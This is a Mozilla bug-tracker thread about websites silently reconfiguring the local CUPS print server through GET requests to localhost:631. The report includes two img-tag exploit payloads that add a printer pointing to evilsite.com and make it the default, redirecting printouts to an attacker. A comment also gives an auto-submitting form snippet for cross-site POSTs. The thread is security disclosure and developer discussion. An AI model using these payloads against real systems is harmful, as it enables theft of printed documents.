Closed Bug 278591 Opened 20 years ago Closed 8 years ago

websites can steal your printer output (etc) by exploiting the wide-open web server CUPS sets up on localhost which allows GET requests to reconfigure CUPS

Categories

(Core :: Networking, defect)

Product:
Core
Component:
Networking
Platform:
x86
Linux
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED WONTFIX

People

(Reporter: peter_jonson, Unassigned)

Details

(Whiteboard: DUPEME?) 

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a6) Gecko/20050111

A webpage can include local resources, eg using an img tag. eg it can access the
CUPS interface (http://localhost:631/). If, since starting the browser, the user
has visited any of the CUPS pages that require a password (there are several),
then simply visiting a website that includes the img tags below will set up a
new printer, make it a network printer pointing back to the attacker, and make
it the default printer. Then any confidential documents printed locally will be
sent to the attacker.

Websites can send arbitrary data to local services, except any that are blocked,
eg port 25. The browser brings this data through any firewall, makes it appear
to come from the local host, and may even helpfully add passwords, as in the
CUPS case above (CUPS uses http authentication). There is no limit to what
standard or non-standard local services may exist now or in the future, or what
exploits may exist against them.

If the website guesses a printer name (or tries many) it can reconfigure it, and
restart all completed jobs. So just visiting the site, with java and javascript
off, may give it all your previously printed documents. It may be possible to
use other tags, eg stylesheet. Even if you have not previously put in the CUPS
password, a site can still submit test pages and delete print jobs. It may be
possible to target the exploit, by putting it in an html email.

Reproducible: Always

Steps to Reproduce:
1.Visit http://localhost:631/ and use one of the password protected pages.
2.Include the img tags below in a webpage.
3.Visit the webpage

Actual Results:  
All my printouts were redirected to evilsite.com

Expected Results:  
The user has privileged access to various local resources. This is intended to
be used with user involvement (eg directly typed url, bookmark, or says OK to
dialogue). Therefore the browser should only allow it to happen with user
involvement. This should apply to a configurable list of machines that includes
the local host by default. (By any name eg localhost, 127.0.0.1, hostname). The
user might for example decide to add the whole of a local network to this list.

Exploit:
<img
src="http://localhost:631/admin/?OP=add-printer&PRINTER_NAME=lp&PRINTER_LOCATION=&PRINTER_INFO=&DEVICE_URI=http%3A%2F%2Fevilsite.com%2F&BAUDRATE=&BITS=&PARITY=&FLOW=&PPD_NAME=raw"></img>
<img src="http://localhost:631/admin/?op=set-as-default&printer_name=lp"></img>

It would be nice to be able to see what sites the browser is storing http
authentication for, and clear them without restarting the whole browser. With
tabbed browsing there may always be several tabs open, so restarting every time
you want to log off a service is extremely inconvenient.
Sounds like we should close of port 631.  Past that, this is a duplicate of
various bugs we already have on file.

> and clear them without restarting the whole browser.

With the Mozilla application suite, you can:  Tools > Password Manager > Log
Out.  This will log out all HTTP authentication sessions.
Webpages don't normally need to include local resources. If one does, the user
should be asked for confirmation.
"local"? that's just another HTTP server...
(In reply to comment #3)
> "local"? that's just another HTTP server...

Bah, you know that's not what the user thinks should happen. Companies set up
elaborate firewalls to prevent connections to internal servers, only to see
browsers poke a big hole in it by allowing any externally-loaded page to
reference any internal URL. Sure, the same-origin policy prevents the external
page from gathering any data this way, but any internal server that accepts
commands via GET (plenty of them in spite of HTTP specs that warn against it) is
vulnerable.

Obviously the attacker would need to know about the internal servers (or guess
at common local services as in this case) but a "disgruntled ex-employee" would
have that kind of knowledge. Prior to Thunderbird's blocking of remote
connections, evil mail to former colleagues is all it would have taken; I
believe Mozilla Suite mail is still vulnerable by default. There are no blocks
in the browser.
Status: UNCONFIRMED → NEW
Ever confirmed: true
This was covered on Slashdot last December:
   http://it.slashdot.org/article.pl?sid=02/12/20/0140249&tid=172
...and is IMHO a CUPS bug, not a Firefox bug. CUPS should be doing Referer
checking; this is a CGI Security 101. Just ask any Web-based game designer.

There's not much we can do about it, since the CUPS CGI configuration could be
on a server other than localhost (e.g. configuring across the network), or on a
different port. And it applies to any CGI script, not just CUPS.
Removing confidential flag as reporters request
Group: security
(In reply to comment #5)
> This was covered on Slashdot last December:
>    http://it.slashdot.org/article.pl?sid=02/12/20/0140249&tid=172
> ...and is IMHO a CUPS bug, not a Firefox bug. CUPS should be doing Referer
> checking; this is a CGI Security 101. Just ask any Web-based game designer.

CUPS should be using POST, not GET, to modify the state of resources. 
Using POST wouldn't help the situation here, since POST can be done completely from JavaScript.
(In reply to comment #8)
> Using POST wouldn't help the situation here, since POST can be done completely
> from JavaScript.

No, the JavaScript security model will prevent this kind of cross-site scripting attack; XmlHttpRequest will only allow a request to go back to the same site.



You can do POST with an HTML form which has a submit() method.  No need for XMLHttpRequest, and no same-origin check.
(In reply to comment #10)
> You can do POST with an HTML form which has a submit() method.  No need for
> XMLHttpRequest, and no same-origin check.

In-ter-esting. In HTTP, unsafe methods should require user interaction; this isn't a hard-and-fast requirement (unfortunately), but the principle is there (e.g., cautions against automatic redirection in section 10.3).

Do you have a demonstration of this (e.g., site A content automatically POSTing to site B without user interaction), and have you filed a bug against it? 

Cheers,
data:text/html,<body onload="document.forms[0].submit()"><form action="POST" action="whatever">...

This is widely used on the web and supported by all browsers.  I also think it's perfectly acceptable behavior, but I do believe there's a bug about having this situation warn the user.  Feel free to search for it.  That's not related to this bug, however.
Severity: critical → major
Daniel & Boris,

Do we still have this problem? We use the same printing backend as Firefox and I think there is the printing code has undergone some rewrites since this bug was opened.
Assignee: general → nobody
Component: General → Printing: Output
Product: SeaMonkey → Core
QA Contact: general → printing
Whiteboard: DUPME?
This has nothing to do with our print subsystem.  Please read the bug.

This should _maybe_ depend on the "don't allow access to internal IPs" bug, but even that might not help if localhost is not an internal IP... of course in that case anyone on the web could reconfigure your printers.
Component: Printing: Output → General
QA Contact: printing → general
Summary: websites can steal your printer output (etc) → websites can steal your printer output (etc) by exploiting the wide-open web server CUPS sets up on localhost which allows GET requests to reconfigure CUPS
And again, should we add port 631 to the blacklist?  That seems to be commonly used for IPP, so arguably we should....  Daniel?
Component: General → Networking
QA Contact: general → networking
Whiteboard: DUPME? → DUPEME?
we've gone this far allowing 631 and I think have shown this is no worse than the general problems with remote content accessing local services.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → WONTFIX
You need to log in before you can comment on or make changes to this bug.